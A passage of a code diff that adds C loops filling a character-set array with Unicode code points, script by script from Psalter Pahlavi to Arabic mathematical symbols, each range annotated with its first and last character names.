+// 10B80..10BAF; Psalter Pahlavi
+	c = 0x10b80;		// from PSALTER PAHLAVI LETTER ALEPH
+	while (c <= 0x10b91)	// ..to PSALTER PAHLAVI LETTER TAW
+		charset[i++] = c++;
+	c = 0x10b99;		// from PSALTER PAHLAVI SECTION MARK
+	while (c <= 0x10b9c)	// ..to PSALTER PAHLAVI FOUR DOTS WITH DOT
+		charset[i++] = c++;
+	c = 0x10ba9;		// from PSALTER PAHLAVI NUMBER ONE
+	while (c <= 0x10baf)	// ..to PSALTER PAHLAVI NUMBER ONE HUNDRED
+		charset[i++] = c++;
+// 10C00..10C4F; Old Turkic
+	c = 0x10c00;		// from OLD TURKIC LETTER ORKHON A
+	while (c <= 0x10c48)	// ..to OLD TURKIC LETTER ORKHON BASH
+		charset[i++] = c++;
+// 10C80..10CFF; Old Hungarian
+	c = 0x10c80;		// from OLD HUNGARIAN CAPITAL LETTER A
+	while (c <= 0x10cb2)	// ..to OLD HUNGARIAN CAPITAL LETTER US
+		charset[i++] = c++;
+	c = 0x10cc0;		// from OLD HUNGARIAN SMALL LETTER A
+	while (c <= 0x10cf2)	// ..to OLD HUNGARIAN SMALL LETTER US
+		charset[i++] = c++;
+	c = 0x10cfa;		// from OLD HUNGARIAN NUMBER ONE
+	while (c <= 0x10cff)	// ..to OLD HUNGARIAN NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 10D00..10D3F; Hanifi Rohingya
+	c = 0x10d00;		// from HANIFI ROHINGYA LETTER A
+	while (c <= 0x10d27)	// ..to HANIFI ROHINGYA SIGN TASSI
+		charset[i++] = c++;
+	c = 0x10d30;		// from HANIFI ROHINGYA DIGIT ZERO
+	while (c <= 0x10d39)	// ..to HANIFI ROHINGYA DIGIT NINE
+		charset[i++] = c++;
+// 10E60..10E7F; Rumi Numeral Symbols
+	c = 0x10e60;		// from RUMI DIGIT ONE
+	while (c <= 0x10e7e)	// ..to RUMI FRACTION TWO THIRDS
+		charset[i++] = c++;
+// 10F00..10F2F; Old Sogdian
+	c = 0x10f00;		// from OLD SOGDIAN LETTER ALEPH
+	while (c <= 0x10f27)	// ..to OLD SOGDIAN LIGATURE AYIN-DALETH
+		charset[i++] = c++;
+// 10F30..10F6F; Sogdian
+	c = 0x10f30;		// from SOGDIAN LETTER ALEPH
+	while (c <= 0x10f59)	// ..to SOGDIAN PUNCTUATION HALF CIRCLE WITH DOT
+		charset[i++] = c++;
+// 11000..1107F; Brahmi
+	c = 0x11000;		// from BRAHMI SIGN CANDRABINDU
+	while (c <= 0x1104d)	// ..to BRAHMI PUNCTUATION LOTUS
+		charset[i++] = c++;
+	c = 0x11052;		// from BRAHMI NUMBER ONE
+	while (c <= 0x1106f)	// ..to BRAHMI DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1107f;	// BRAHMI NUMBER JOINER
+// 11080..110CF; Kaithi
+	c = 0x11080;		// from KAITHI SIGN CANDRABINDU
+	while (c <= 0x110c1)	// ..to KAITHI DOUBLE DANDA
+		charset[i++] = c++;
+	charset[i++] = 0x110cd;	// KAITHI NUMBER SIGN ABOVE
+// 110D0..110FF; Sora Sompeng
+	c = 0x110d0;		// from SORA SOMPENG LETTER SAH
+	while (c <= 0x110e8)	// ..to SORA SOMPENG LETTER MAE
+		charset[i++] = c++;
+	c = 0x110f0;		// from SORA SOMPENG DIGIT ZERO
+	while (c <= 0x110f9)	// ..to SORA SOMPENG DIGIT NINE
+		charset[i++] = c++;
+// 11100..1114F; Chakma
+	c = 0x11100;		// from CHAKMA SIGN CANDRABINDU
+	while (c <= 0x11134)	// ..to CHAKMA MAAYYAA
+		charset[i++] = c++;
+	c = 0x11136;		// from CHAKMA DIGIT ZERO
+	while (c <= 0x11146)	// ..to CHAKMA VOWEL SIGN EI
+		charset[i++] = c++;
+// 11150..1117F; Mahajani
+	c = 0x11150;		// from MAHAJANI LETTER A
+	while (c <= 0x11176)	// ..to MAHAJANI LIGATURE SHRI
+		charset[i++] = c++;
+// 11180..111DF; Sharada
+	c = 0x11180;		// from SHARADA SIGN CANDRABINDU
+	while (c <= 0x111cd)	// ..to SHARADA SUTRA MARK
+		charset[i++] = c++;
+	c = 0x111d0;		// from SHARADA DIGIT ZERO
+	while (c <= 0x111df)	// ..to SHARADA SECTION MARK-2
+		charset[i++] = c++;
+// 111E0..111FF; Sinhala Archaic Numbers
+	c = 0x111e1;		// from SINHALA ARCHAIC DIGIT ONE
+	while (c <= 0x111f4)	// ..to SINHALA ARCHAIC NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 11200..1124F; Khojki
+	c = 0x11200;		// from KHOJKI LETTER A
+	while (c <= 0x11211)	// ..to KHOJKI LETTER JJA
+		charset[i++] = c++;
+	c = 0x11213;		// from KHOJKI LETTER NYA
+	while (c <= 0x1123e)	// ..to KHOJKI SIGN SUKUN
+		charset[i++] = c++;
+// 11280..112AF; Multani
+	c = 0x11280;		// from MULTANI LETTER A
+	while (c <= 0x11286)	// ..to MULTANI LETTER GA
+		charset[i++] = c++;
+	c = 0x1128a;		// from MULTANI LETTER CA
+	while (c <= 0x1128d)	// ..to MULTANI LETTER JJA
+		charset[i++] = c++;
+	c = 0x1128f;		// from MULTANI LETTER NYA
+	while (c <= 0x1129d)	// ..to MULTANI LETTER BA
+		charset[i++] = c++;
+	c = 0x1129f;		// from MULTANI LETTER BHA
+	while (c <= 0x112a9)	// ..to MULTANI SECTION MARK
+		charset[i++] = c++;
+// 112B0..112FF; Khudawadi
+	c = 0x112b0;		// from KHUDAWADI LETTER A
+	while (c <= 0x112ea)	// ..to KHUDAWADI SIGN VIRAMA
+		charset[i++] = c++;
+	c = 0x112f0;		// from KHUDAWADI DIGIT ZERO
+	while (c <= 0x112f9)	// ..to KHUDAWADI DIGIT NINE
+		charset[i++] = c++;
+// 11300..1137F; Grantha
+	c = 0x11300;		// from GRANTHA SIGN COMBINING ANUSVARA ABOVE
+	while (c <= 0x11303)	// ..to GRANTHA SIGN VISARGA
+		charset[i++] = c++;
+	c = 0x11305;		// from GRANTHA LETTER A
+	while (c <= 0x1130c)	// ..to GRANTHA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0x1130f;	// GRANTHA LETTER EE
+	charset[i++] = 0x11310;	// GRANTHA LETTER AI
+	c = 0x11313;		// from GRANTHA LETTER OO
+	while (c <= 0x11328)	// ..to GRANTHA LETTER NA
+		charset[i++] = c++;
+	c = 0x1132a;		// from GRANTHA LETTER PA
+	while (c <= 0x11330)	// ..to GRANTHA LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0x11332;	// GRANTHA LETTER LA
+	charset[i++] = 0x11333;	// GRANTHA LETTER LLA
+	c = 0x11335;		// from GRANTHA LETTER VA
+	while (c <= 0x11339)	// ..to GRANTHA LETTER HA
+		charset[i++] = c++;
+	c = 0x1133b;		// from COMBINING BINDU BELOW
+	while (c <= 0x11344)	// ..to GRANTHA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0x11347;	// GRANTHA VOWEL SIGN EE
+	charset[i++] = 0x11348;	// GRANTHA VOWEL SIGN AI
+	charset[i++] = 0x1134b;	// GRANTHA VOWEL SIGN OO
+	charset[i++] = 0x1134d;	// GRANTHA SIGN VIRAMA
+	c = 0x1135d;		// from GRANTHA SIGN PLUTA
+	while (c <= 0x11363)	// ..to GRANTHA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x11366;		// from COMBINING GRANTHA DIGIT ZERO
+	while (c <= 0x1136c)	// ..to COMBINING GRANTHA DIGIT SIX
+		charset[i++] = c++;
+	c = 0x11370;		// from COMBINING GRANTHA LETTER A
+	while (c <= 0x11374)	// ..to COMBINING GRANTHA LETTER PA
+		charset[i++] = c++;
+// 11400..1147F; Newa
+	c = 0x11400;		// from NEWA LETTER A
+	while (c <= 0x11459)	// ..to NEWA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1145d;	// NEWA INSERTION SIGN
+	charset[i++] = 0x1145e;	// NEWA SANDHI MARK
+// 11480..114DF; Tirhuta
+	c = 0x11480;		// from TIRHUTA ANJI
+	while (c <= 0x114c7)	// ..to TIRHUTA OM
+		charset[i++] = c++;
+	c = 0x114d0;		// from TIRHUTA DIGIT ZERO
+	while (c <= 0x114d9)	// ..to TIRHUTA DIGIT NINE
+		charset[i++] = c++;
+// 11580..115FF; Siddham
+	c = 0x11580;		// from SIDDHAM LETTER A
+	while (c <= 0x115b5)	// ..to SIDDHAM VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	c = 0x115b8;		// from SIDDHAM VOWEL SIGN E
+	while (c <= 0x115dd)	// ..to SIDDHAM VOWEL SIGN ALTERNATE UU
+		charset[i++] = c++;
+// 11600..1165F; Modi
+	c = 0x11600;		// from MODI LETTER A
+	while (c <= 0x11644)	// ..to MODI SIGN HUVA
+		charset[i++] = c++;
+	c = 0x11650;		// from MODI DIGIT ZERO
+	while (c <= 0x11659)	// ..to MODI DIGIT NINE
+		charset[i++] = c++;
+// 11660..1167F; Mongolian Supplement
+	c = 0x11660;		// from MONGOLIAN BIRGA WITH ORNAMENT
+	while (c <= 0x1166c)	// ..to MONGOLIAN TURNED SWIRL BIRGA WITH DOUBLE ORNAMENT
+		charset[i++] = c++;
+// 11680..116CF; Takri
+	c = 0x11680;		// from TAKRI LETTER A
+	while (c <= 0x116b7)	// ..to TAKRI SIGN NUKTA
+		charset[i++] = c++;
+	c = 0x116c0;		// from TAKRI DIGIT ZERO
+	while (c <= 0x116c9)	// ..to TAKRI DIGIT NINE
+		charset[i++] = c++;
+// 11700..1173F; Ahom
+	c = 0x11700;		// from AHOM LETTER KA
+	while (c <= 0x1171a)	// ..to AHOM LETTER ALTERNATE BA
+		charset[i++] = c++;
+	c = 0x1171d;		// from AHOM CONSONANT SIGN MEDIAL LA
+	while (c <= 0x1172b)	// ..to AHOM SIGN KILLER
+		charset[i++] = c++;
+	c = 0x11730;		// from AHOM DIGIT ZERO
+	while (c <= 0x1173f)	// ..to AHOM SYMBOL VI
+		charset[i++] = c++;
+// 11800..1184F; Dogra
+	c = 0x11800;		// from DOGRA LETTER A
+	while (c <= 0x1183b)	// ..to DOGRA ABBREVIATION SIGN
+		charset[i++] = c++;
+// 118A0..118FF; Warang Citi
+	c = 0x118a0;		// from WARANG CITI CAPITAL LETTER NGAA
+	while (c <= 0x118f2)	// ..to WARANG CITI NUMBER NINETY
+		charset[i++] = c++;
+	charset[i++] = 0x118ff;	// WARANG CITI OM
+// 11A00..11A4F; Zanabazar Square
+	c = 0x11a00;		// from ZANABAZAR SQUARE LETTER A
+	while (c <= 0x11a47)	// ..to ZANABAZAR SQUARE SUBJOINER
+		charset[i++] = c++;
+// 11A50..11AAF; Soyombo
+	c = 0x11a50;		// from SOYOMBO LETTER A
+	while (c <= 0x11a83)	// ..to SOYOMBO LETTER KSSA
+		charset[i++] = c++;
+	c = 0x11a86;		// from SOYOMBO CLUSTER-INITIAL LETTER RA
+	while (c <= 0x11aa2)	// ..to SOYOMBO TERMINAL MARK-2
+		charset[i++] = c++;
+// 11AC0..11AFF; Pau Cin Hau
+	c = 0x11ac0;		// from PAU CIN HAU LETTER PA
+	while (c <= 0x11af8)	// ..to PAU CIN HAU GLOTTAL STOP FINAL
+		charset[i++] = c++;
+// 11C00..11C6F; Bhaiksuki
+	c = 0x11c00;		// from BHAIKSUKI LETTER A
+	while (c <= 0x11c08)	// ..to BHAIKSUKI LETTER VOCALIC L
+		charset[i++] = c++;
+	c = 0x11c0a;		// from BHAIKSUKI LETTER E
+	while (c <= 0x11c36)	// ..to BHAIKSUKI VOWEL SIGN VOCALIC L
+		charset[i++] = c++;
+	c = 0x11c38;		// from BHAIKSUKI VOWEL SIGN E
+	while (c <= 0x11c45)	// ..to BHAIKSUKI GAP FILLER-2
+		charset[i++] = c++;
+	c = 0x11c50;		// from BHAIKSUKI DIGIT ZERO
+	while (c <= 0x11c6c)	// ..to BHAIKSUKI HUNDREDS UNIT MARK
+		charset[i++] = c++;
+// 11C70..11CBF; Marchen
+	c = 0x11c70;		// from MARCHEN HEAD MARK
+	while (c <= 0x11c8f)	// ..to MARCHEN LETTER A
+		charset[i++] = c++;
+	c = 0x11c92;		// from MARCHEN SUBJOINED LETTER KA
+	while (c <= 0x11ca7)	// ..to MARCHEN SUBJOINED LETTER ZA
+		charset[i++] = c++;
+	c = 0x11ca9;		// from MARCHEN SUBJOINED LETTER YA
+	while (c <= 0x11cb6)	// ..to MARCHEN SIGN CANDRABINDU
+		charset[i++] = c++;
+// 11D00..11D5F; Masaram Gondi
+	c = 0x11d00;		// from MASARAM GONDI LETTER A
+	while (c <= 0x11d06)	// ..to MASARAM GONDI LETTER E
+		charset[i++] = c++;
+	charset[i++] = 0x11d08;	// MASARAM GONDI LETTER AI
+	charset[i++] = 0x11d09;	// MASARAM GONDI LETTER O
+	c = 0x11d0b;		// from MASARAM GONDI LETTER AU
+	while (c <= 0x11d36)	// ..to MASARAM GONDI VOWEL SIGN VOCALIC R
+		charset[i++] = c++;
+	charset[i++] = 0x11d3c;	// MASARAM GONDI VOWEL SIGN AI
+	charset[i++] = 0x11d3d;	// MASARAM GONDI VOWEL SIGN O
+	c = 0x11d3f;		// from MASARAM GONDI VOWEL SIGN AU
+	while (c <= 0x11d47)	// ..to MASARAM GONDI RA-KARA
+		charset[i++] = c++;
+	c = 0x11d50;		// from MASARAM GONDI DIGIT ZERO
+	while (c <= 0x11d59)	// ..to MASARAM GONDI DIGIT NINE
+		charset[i++] = c++;
+// 11D60..11DAF; Gunjala Gondi
+	c = 0x11d60;		// from GUNJALA GONDI LETTER A
+	while (c <= 0x11d65)	// ..to GUNJALA GONDI LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0x11d67;	// GUNJALA GONDI LETTER EE
+	charset[i++] = 0x11d68;	// GUNJALA GONDI LETTER AI
+	c = 0x11d6a;		// from GUNJALA GONDI LETTER OO
+	while (c <= 0x11d8e)	// ..to GUNJALA GONDI VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0x11d90;	// GUNJALA GONDI VOWEL SIGN EE
+	charset[i++] = 0x11d91;	// GUNJALA GONDI VOWEL SIGN AI
+	c = 0x11d93;		// from GUNJALA GONDI VOWEL SIGN OO
+	while (c <= 0x11d98)	// ..to GUNJALA GONDI OM
+		charset[i++] = c++;
+	c = 0x11da0;		// from GUNJALA GONDI DIGIT ZERO
+	while (c <= 0x11da9)	// ..to GUNJALA GONDI DIGIT NINE
+		charset[i++] = c++;
+// 11EE0..11EFF; Makasar
+	c = 0x11ee0;		// from MAKASAR LETTER KA
+	while (c <= 0x11ef8)	// ..to MAKASAR END OF SECTION
+		charset[i++] = c++;
+// 12000..123FF; Cuneiform
+	c = 0x12000;		// from CUNEIFORM SIGN A
+	while (c <= 0x12399)	// ..to CUNEIFORM SIGN U U
+		charset[i++] = c++;
+// 12400..1247F; Cuneiform Numbers and Punctuation
+	c = 0x12400;		// from CUNEIFORM NUMERIC SIGN TWO ASH
+	while (c <= 0x1246e)	// ..to CUNEIFORM NUMERIC SIGN NINE U VARIANT FORM
+		charset[i++] = c++;
+	c = 0x12470;		// from CUNEIFORM PUNCTUATION SIGN OLD ASSYRIAN WORD DIVIDER
+	while (c <= 0x12474)	// ..to CUNEIFORM PUNCTUATION SIGN DIAGONAL QUADCOLON
+		charset[i++] = c++;
+// 12480..1254F; Early Dynastic Cuneiform
+	c = 0x12480;		// from CUNEIFORM SIGN AB TIMES NUN TENU
+	while (c <= 0x12543)	// ..to CUNEIFORM SIGN ZU5 TIMES THREE DISH TENU
+		charset[i++] = c++;
+// 13000..1342F; Egyptian Hieroglyphs
+	c = 0x13000;		// from EGYPTIAN HIEROGLYPH A001
+	while (c <= 0x1342e)	// ..to EGYPTIAN HIEROGLYPH AA032
+		charset[i++] = c++;
+// 14400..1467F; Anatolian Hieroglyphs
+	c = 0x14400;		// from ANATOLIAN HIEROGLYPH A001
+	while (c <= 0x14646)	// ..to ANATOLIAN HIEROGLYPH A530
+		charset[i++] = c++;
+// 16800..16A3F; Bamum Supplement
+	c = 0x16800;		// from BAMUM LETTER PHASE-A NGKUE MFON
+	while (c <= 0x16a38)	// ..to BAMUM LETTER PHASE-F VUEQ
+		charset[i++] = c++;
+// 16A40..16A6F; Mro
+	c = 0x16a40;		// from MRO LETTER TA
+	while (c <= 0x16a5e)	// ..to MRO LETTER TEK
+		charset[i++] = c++;
+	c = 0x16a60;		// from MRO DIGIT ZERO
+	while (c <= 0x16a69)	// ..to MRO DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x16a6e;	// MRO DANDA
+	charset[i++] = 0x16a6f;	// MRO DOUBLE DANDA
+// 16AD0..16AFF; Bassa Vah
+	c = 0x16ad0;		// from BASSA VAH LETTER ENNI
+	while (c <= 0x16aed)	// ..to BASSA VAH LETTER I
+		charset[i++] = c++;
+	c = 0x16af0;		// from BASSA VAH COMBINING HIGH TONE
+	while (c <= 0x16af5)	// ..to BASSA VAH FULL STOP
+		charset[i++] = c++;
+// 16B00..16B8F; Pahawh Hmong
+	c = 0x16b00;		// from PAHAWH HMONG VOWEL KEEB
+	while (c <= 0x16b45)	// ..to PAHAWH HMONG SIGN CIM TSOV ROG
+		charset[i++] = c++;
+	c = 0x16b50;		// from PAHAWH HMONG DIGIT ZERO
+	while (c <= 0x16b59)	// ..to PAHAWH HMONG DIGIT NINE
+		charset[i++] = c++;
+	c = 0x16b5b;		// from PAHAWH HMONG NUMBER TENS
+	while (c <= 0x16b61)	// ..to PAHAWH HMONG NUMBER TRILLIONS
+		charset[i++] = c++;
+	c = 0x16b63;		// from PAHAWH HMONG SIGN VOS LUB
+	while (c <= 0x16b77)	// ..to PAHAWH HMONG SIGN CIM NRES TOS
+		charset[i++] = c++;
+	c = 0x16b7d;		// from PAHAWH HMONG CLAN SIGN TSHEEJ
+	while (c <= 0x16b8f)	// ..to PAHAWH HMONG CLAN SIGN VWJ
+		charset[i++] = c++;
+// 16E40..16E9F; Medefaidrin
+	c = 0x16e40;		// from MEDEFAIDRIN CAPITAL LETTER M
+	while (c <= 0x16e9a)	// ..to MEDEFAIDRIN EXCLAMATION OH
+		charset[i++] = c++;
+// 16F00..16F9F; Miao
+	c = 0x16f00;		// from MIAO LETTER PA
+	while (c <= 0x16f44)	// ..to MIAO LETTER HHA
+		charset[i++] = c++;
+	c = 0x16f50;		// from MIAO LETTER NASALIZATION
+	while (c <= 0x16f7e)	// ..to MIAO VOWEL SIGN NG
+		charset[i++] = c++;
+	c = 0x16f8f;		// from MIAO TONE RIGHT
+	while (c <= 0x16f9f)	// ..to MIAO LETTER REFORMED TONE-8
+		charset[i++] = c++;
+// 16FE0..16FFF; Ideographic Symbols and Punctuation
+	charset[i++] = 0x16fe0;	// TANGUT ITERATION MARK
+	charset[i++] = 0x16fe1;	// NUSHU ITERATION MARK
+// 17000..187FF; Tangut
+	c = 0x17000;		// from <Tangut Ideograph, First>
+	while (c <= 0x187f1)	// ..to <Tangut Ideograph, Last>
+		charset[i++] = c++;
+// 18800..18AFF; Tangut Components
+	c = 0x18800;		// from TANGUT COMPONENT-001
+	while (c <= 0x18af2)	// ..to TANGUT COMPONENT-755
+		charset[i++] = c++;
+// 1B000..1B0FF; Kana Supplement
+	c = 0x1b000;		// from KATAKANA LETTER ARCHAIC E
+	while (c <= 0x1b0ff)	// ..to HENTAIGANA LETTER RE-2
+		charset[i++] = c++;
+// 1B100..1B12F; Kana Extended-A
+	c = 0x1b100;		// from HENTAIGANA LETTER RE-3
+	while (c <= 0x1b11e)	// ..to HENTAIGANA LETTER N-MU-MO-2
+		charset[i++] = c++;
+// 1B170..1B2FF; Nushu
+	c = 0x1b170;		// from NUSHU CHARACTER-1B170
+	while (c <= 0x1b2fb)	// ..to NUSHU CHARACTER-1B2FB
+		charset[i++] = c++;
+// 1BC00..1BC9F; Duployan
+	c = 0x1bc00;		// from DUPLOYAN LETTER H
+	while (c <= 0x1bc6a)	// ..to DUPLOYAN LETTER VOCALIC M
+		charset[i++] = c++;
+	c = 0x1bc70;		// from DUPLOYAN AFFIX LEFT HORIZONTAL SECANT
+	while (c <= 0x1bc7c)	// ..to DUPLOYAN AFFIX ATTACHED TANGENT HOOK
+		charset[i++] = c++;
+	c = 0x1bc80;		// from DUPLOYAN AFFIX HIGH ACUTE
+	while (c <= 0x1bc88)	// ..to DUPLOYAN AFFIX HIGH VERTICAL
+		charset[i++] = c++;
+	c = 0x1bc90;		// from DUPLOYAN AFFIX LOW ACUTE
+	while (c <= 0x1bc99)	// ..to DUPLOYAN AFFIX LOW ARROW
+		charset[i++] = c++;
+	c = 0x1bc9c;		// from DUPLOYAN SIGN O WITH CROSS
+	while (c <= 0x1bc9f)	// ..to DUPLOYAN PUNCTUATION CHINOOK FULL STOP
+		charset[i++] = c++;
+// 1BCA0..1BCAF; Shorthand Format Controls
+	c = 0x1bca0;		// from SHORTHAND FORMAT LETTER OVERLAP
+	while (c <= 0x1bca3)	// ..to SHORTHAND FORMAT UP STEP
+		charset[i++] = c++;
+// 1D000..1D0FF; Byzantine Musical Symbols
+	c = 0x1d000;		// from BYZANTINE MUSICAL SYMBOL PSILI
+	while (c <= 0x1d0f5)	// ..to BYZANTINE MUSICAL SYMBOL GORGON NEO KATO
+		charset[i++] = c++;
+// 1D100..1D1FF; Musical Symbols
+	c = 0x1d100;		// from MUSICAL SYMBOL SINGLE BARLINE
+	while (c <= 0x1d126)	// ..to MUSICAL SYMBOL DRUM CLEF-2
+		charset[i++] = c++;
+	c = 0x1d129;		// from MUSICAL SYMBOL MULTIPLE MEASURE REST
+	while (c <= 0x1d1e8)	// ..to MUSICAL SYMBOL KIEVAN FLAT SIGN
+		charset[i++] = c++;
+// 1D200..1D24F; Ancient Greek Musical Notation
+	c = 0x1d200;		// from GREEK VOCAL NOTATION SYMBOL-1
+	while (c <= 0x1d245)	// ..to GREEK MUSICAL LEIMMA
+		charset[i++] = c++;
+// 1D2E0..1D2FF; Mayan Numerals
+	c = 0x1d2e0;		// from MAYAN NUMERAL ZERO
+	while (c <= 0x1d2f3)	// ..to MAYAN NUMERAL NINETEEN
+		charset[i++] = c++;
+// 1D300..1D35F; Tai Xuan Jing Symbols
+	c = 0x1d300;		// from MONOGRAM FOR EARTH
+	while (c <= 0x1d356)	// ..to TETRAGRAM FOR FOSTERING
+		charset[i++] = c++;
+// 1D360..1D37F; Counting Rod Numerals
+	c = 0x1d360;		// from COUNTING ROD UNIT DIGIT ONE
+	while (c <= 0x1d378)	// ..to TALLY MARK FIVE
+		charset[i++] = c++;
+// 1D400..1D7FF; Mathematical Alphanumeric Symbols
+	c = 0x1d400;		// from MATHEMATICAL BOLD CAPITAL A
+	while (c <= 0x1d454)	// ..to MATHEMATICAL ITALIC SMALL G
+		charset[i++] = c++;
+	c = 0x1d456;		// from MATHEMATICAL ITALIC SMALL I
+	while (c <= 0x1d49c)	// ..to MATHEMATICAL SCRIPT CAPITAL A
+		charset[i++] = c++;
+	charset[i++] = 0x1d49e;	// MATHEMATICAL SCRIPT CAPITAL C
+	charset[i++] = 0x1d49f;	// MATHEMATICAL SCRIPT CAPITAL D
+	charset[i++] = 0x1d4a5;	// MATHEMATICAL SCRIPT CAPITAL J
+	charset[i++] = 0x1d4a6;	// MATHEMATICAL SCRIPT CAPITAL K
+	c = 0x1d4a9;		// from MATHEMATICAL SCRIPT CAPITAL N
+	while (c <= 0x1d4ac)	// ..to MATHEMATICAL SCRIPT CAPITAL Q
+		charset[i++] = c++;
+	c = 0x1d4ae;		// from MATHEMATICAL SCRIPT CAPITAL S
+	while (c <= 0x1d4b9)	// ..to MATHEMATICAL SCRIPT SMALL D
+		charset[i++] = c++;
+	c = 0x1d4bd;		// from MATHEMATICAL SCRIPT SMALL H
+	while (c <= 0x1d4c3)	// ..to MATHEMATICAL SCRIPT SMALL N
+		charset[i++] = c++;
+	c = 0x1d4c5;		// from MATHEMATICAL SCRIPT SMALL P
+	while (c <= 0x1d505)	// ..to MATHEMATICAL FRAKTUR CAPITAL B
+		charset[i++] = c++;
+	c = 0x1d507;		// from MATHEMATICAL FRAKTUR CAPITAL D
+	while (c <= 0x1d50a)	// ..to MATHEMATICAL FRAKTUR CAPITAL G
+		charset[i++] = c++;
+	c = 0x1d50d;		// from MATHEMATICAL FRAKTUR CAPITAL J
+	while (c <= 0x1d514)	// ..to MATHEMATICAL FRAKTUR CAPITAL Q
+		charset[i++] = c++;
+	c = 0x1d516;		// from MATHEMATICAL FRAKTUR CAPITAL S
+	while (c <= 0x1d51c)	// ..to MATHEMATICAL FRAKTUR CAPITAL Y
+		charset[i++] = c++;
+	c = 0x1d51e;		// from MATHEMATICAL FRAKTUR SMALL A
+	while (c <= 0x1d539)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL B
+		charset[i++] = c++;
+	c = 0x1d53b;		// from MATHEMATICAL DOUBLE-STRUCK CAPITAL D
+	while (c <= 0x1d53e)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL G
+		charset[i++] = c++;
+	c = 0x1d540;		// from MATHEMATICAL DOUBLE-STRUCK CAPITAL I
+	while (c <= 0x1d544)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL M
+		charset[i++] = c++;
+	c = 0x1d54a;		// from MATHEMATICAL DOUBLE-STRUCK CAPITAL S
+	while (c <= 0x1d550)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL Y
+		charset[i++] = c++;
+	c = 0x1d552;		// from MATHEMATICAL DOUBLE-STRUCK SMALL A
+	while (c <= 0x1d6a5)	// ..to MATHEMATICAL ITALIC SMALL DOTLESS J
+		charset[i++] = c++;
+	c = 0x1d6a8;		// from MATHEMATICAL BOLD CAPITAL ALPHA
+	while (c <= 0x1d7cb)	// ..to MATHEMATICAL BOLD SMALL DIGAMMA
+		charset[i++] = c++;
+	c = 0x1d7ce;		// from MATHEMATICAL BOLD DIGIT ZERO
+	while (c <= 0x1d7ff)	// ..to MATHEMATICAL MONOSPACE DIGIT NINE
+		charset[i++] = c++;
+// 1D800..1DAAF; Sutton SignWriting
+	c = 0x1d800;		// from SIGNWRITING HAND-FIST INDEX
+	while (c <= 0x1da8b)	// ..to SIGNWRITING PARENTHESIS
+		charset[i++] = c++;
+	c = 0x1da9b;		// from SIGNWRITING FILL MODIFIER-2
+	while (c <= 0x1da9f)	// ..to SIGNWRITING FILL MODIFIER-6
+		charset[i++] = c++;
+	c = 0x1daa1;		// from SIGNWRITING ROTATION MODIFIER-2
+	while (c <= 0x1daaf)	// ..to SIGNWRITING ROTATION MODIFIER-16
+		charset[i++] = c++;
+// 1E000..1E02F; Glagolitic Supplement
+	c = 0x1e000;		// from COMBINING GLAGOLITIC LETTER AZU
+	while (c <= 0x1e006)	// ..to COMBINING GLAGOLITIC LETTER ZHIVETE
+		charset[i++] = c++;
+	c = 0x1e008;		// from COMBINING GLAGOLITIC LETTER ZEMLJA
+	while (c <= 0x1e018)	// ..to COMBINING GLAGOLITIC LETTER HERU
+		charset[i++] = c++;
+	c = 0x1e01b;		// from COMBINING GLAGOLITIC LETTER SHTA
+	while (c <= 0x1e021)	// ..to COMBINING GLAGOLITIC LETTER YATI
+		charset[i++] = c++;
+	charset[i++] = 0x1e023;	// COMBINING GLAGOLITIC LETTER YU
+	charset[i++] = 0x1e024;	// COMBINING GLAGOLITIC LETTER SMALL YUS
+	c = 0x1e026;		// from COMBINING GLAGOLITIC LETTER YO
+	while (c <= 0x1e02a)	// ..to COMBINING GLAGOLITIC LETTER FITA
+		charset[i++] = c++;
+// 1E800..1E8DF; Mende Kikakui
+	c = 0x1e800;		// from MENDE KIKAKUI SYLLABLE M001 KI
+	while (c <= 0x1e8c4)	// ..to MENDE KIKAKUI SYLLABLE M060 NYON
+		charset[i++] = c++;
+	c = 0x1e8c7;		// from MENDE KIKAKUI DIGIT ONE
+	while (c <= 0x1e8d6)	// ..to MENDE KIKAKUI COMBINING NUMBER MILLIONS
+		charset[i++] = c++;
+// 1E900..1E95F; Adlam
+	c = 0x1e900;		// from ADLAM CAPITAL LETTER ALIF
+	while (c <= 0x1e94a)	// ..to ADLAM NUKTA
+		charset[i++] = c++;
+	c = 0x1e950;		// from ADLAM DIGIT ZERO
+	while (c <= 0x1e959)	// ..to ADLAM DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1e95e;	// ADLAM INITIAL EXCLAMATION MARK
+	charset[i++] = 0x1e95f;	// ADLAM INITIAL QUESTION MARK
+// 1EC70..1ECBF; Indic Siyaq Numbers
+	c = 0x1ec71;		// from INDIC SIYAQ NUMBER ONE
+	while (c <= 0x1ecb4)	// ..to INDIC SIYAQ ALTERNATE LAKH MARK
+		charset[i++] = c++;
+// 1EE00..1EEFF; Arabic Mathematical Alphabetic Symbols
+	c = 0x1ee00;		// from ARABIC MATHEMATICAL ALEF
+	while (c <= 0x1ee03)	// ..to ARABIC MATHEMATICAL DAL
+		charset[i++] = c++;
+	c = 0x1ee05;		// from ARABIC MATHEMATICAL WAW
+	while (c <= 0x1ee1f)	// ..to ARABIC MATHEMATICAL DOTLESS QAF
+		charset[i++] = c++;
+	charset[i++] = 0x1ee21;	// ARABIC MATHEMATICAL INITIAL BEH
+	charset[i++] = 0x1ee22;	// ARABIC MATHEMATICAL INITIAL JEEM
+	c = 0x1ee29;		// from ARABIC MATHEMATICAL INITIAL YEH
+	while (c <= 0x1ee32)	// ..to ARABIC MATHEMATICAL INITIAL QAF
+		charset[i++] = c++;
+	c = 0x1ee34;		// from ARABIC MATHEMATICAL INITIAL SHEEN
+	while (c <= 0x1ee37)	// ..to ARABIC MATHEMATICAL INITIAL KHAH
